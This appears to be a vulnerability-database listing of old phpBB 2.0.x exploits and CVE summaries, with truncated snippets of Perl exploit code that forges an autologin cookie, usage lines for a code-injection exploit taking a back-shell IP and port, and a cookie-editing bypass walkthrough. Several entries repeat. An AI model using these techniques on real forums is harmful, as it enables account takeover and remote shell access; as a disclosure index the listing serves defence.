phpBB 2.0.13 - downloads.php mod Get Hash

phpBB 2.0.13 - downloads.php mod Get Hash !/usr/bin/perl -w use IO::Socket; Example: C:\phpbb.pl www.site.com /phpBB2/ 2 downloads.php mod in phpBB \n"; print " e.g.: phpbb.pl www.site.com /phpBB2/ 2 \n"; print " - site address\n"; print " - forum folder\n"; print " - user id 2 default for phpBB...

phpBB <= 2.0.12 Change User Rights Authentication Bypass

Exploit for unknown platform in category web applications ======================================================== phpBB new ; my $cookiejar = HTTP::Cookies-new ; $browser-cookiejar $cookiejar ; $cookiejar-setcookie "0","phpbb2mysqldata", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B...

phpbb &lt;= 2.0.12 uid vuln + admin_styles.php php code injection exploit

phpbbexp.exe http://site.com/phpbb/ backshell ip backshell port coded by Malloc0 Wicked Attitude tested on phpbb 2.0.11 C:dtcphpbbexp.exe http://site.com/phpbb2/ 13.37.13.37 8888 nom du cookie recuperer : phpbb2mysql SESSION ID recuperЪ ... 06bef5092f9d369f13107684f63a3499...

CVE-2005-0259

phpBB 2.0.11, and possibly other versions, with remote avatars and avatar uploading enabled, allows local users to read arbitrary files by providing both a local and remote location for an avatar, then modifying the "Upload Avatar from a URL:" field to reference the target file...

phpBB &lt;= 2.0.12 Session Handling Authentication Bypass (tutorial 2)

No description provided by source. phpBB 2.0.12 Session Handling Authentication Bypass .. easy to use exploit .. YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM.. 1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made : 3- Close the Browser .. 2- Open the cookies.t...

CVE-2005-0673

Cross-site scripting XSS vulnerability in usercpregister.php for phpBB 2.0.13 allows remote attackers to inject arbitrary web script or HTML by setting the 1 allowhtml, 2 allowbbcode, or 3 allowsmilies parameters to inject HTML into signatures for personal messages, possibly when they are process...

CVE-2005-0659

phpBB 2.0.13 and earlier allows remote attackers to obtain sensitive information via a direct request to oracle.php, which reveals the path in a PHP error message...

-==phpBB 2.0.13 Full path disclosure==-

/ -------------------------------------------------------- Neo Security Team NST® - Advisory 09 - 03/03/05 -------------------------------------------------------- Program: phpBB 2.0.13 Homepage: http://www.phpbb.com Vulnerable Versions: phpBB 2.0.13 & Lower versions Risk: Low Risk!! Impact: Full...

CVE-2005-0614

sessions.php in phpBB 2.0.12 and earlier allows remote attackers to gain administrator privileges via the autologinid value in a cookie...

CVE-2005-0603

viewtopic.php in phpBB 2.0.12 and earlier allows remote attackers to obtain sensitive information via a highlight parameter containing invalid regular expression syntax, which reveals the path in a PHP error message...

CVE-2005-0603

viewtopic.php in phpBB 2.0.12 and earlier allows remote attackers to obtain sensitive information via a highlight parameter containing invalid regular expression syntax, which reveals the path in a PHP error message...

phpBB < 2.0.13 Cookie Authentication Bypass

Binary data 2658.prm...

phpBB 2.0.x - Authentication Bypass (3)

phpBB 2.0.x - Authentication Bypass 3 source: https://www.securityfocus.com/bid/12678/info phpBB is affected by an authentication bypass vulnerability. This issue is due to the application failing to properly sanitize user-supplied input during authentication. Exploitation of this vulnerability...

phpBB 2.0.x - Authentication Bypass (2)

phpBB 2.0.x - Authentication Bypass 2 source: https://www.securityfocus.com/bid/12678/info phpBB is affected by an authentication bypass vulnerability. This issue is due to the application failing to properly sanitize user-supplied input during authentication. Exploitation of this vulnerability...

phpBB 2.0.x - Authentication Bypass (1)

phpBB 2.0.x - Authentication Bypass 1 // source: https://www.securityfocus.com/bid/12678/info phpBB is affected by an authentication bypass vulnerability. This issue is due to the application failing to properly sanitize user-supplied input during authentication. Exploitation of this vulnerabilit...

phpBB 2.0.x - Authentication Bypass (2)

source: https://www.securityfocus.com/bid/12678/info phpBB is affected by an authentication bypass vulnerability. This issue is due to the application failing to properly sanitize user-supplied input during authentication. Exploitation of this vulnerability would permit unauthorized access to any...

phpBB 2.0.x - Authentication Bypass (1)

// source: https://www.securityfocus.com/bid/12678/info phpBB is affected by an authentication bypass vulnerability. This issue is due to the application failing to properly sanitize user-supplied input during authentication. Exploitation of this vulnerability would permit unauthorized access to...

phpBB 2.0.x - Authentication Bypass (3)

source: https://www.securityfocus.com/bid/12678/info phpBB is affected by an authentication bypass vulnerability. This issue is due to the application failing to properly sanitize user-supplied input during authentication. Exploitation of this vulnerability would permit unauthorized access to any...

phpbb -- Insuffient check against HTML code in usercp_register.php

Neo Security Team reports: If we specify a variable in the html code any type: hidden, text, radio, check, etc with the name allowhtml, allowbbcode or allowsmilies, is going to be on the html, bbcode and smilies in our signature. This is a low risk vulnerability that allows users to bypass...

phpBB vulnerable to file disclosure

Overview The phpBB input validation methods may fail to sanitize user input resulting in a disclosure of arbitrary file data. Description phpBB is a customizable open source bulletin board package. It contains functionality that allows users to specify graphic files for use as "avatars." These...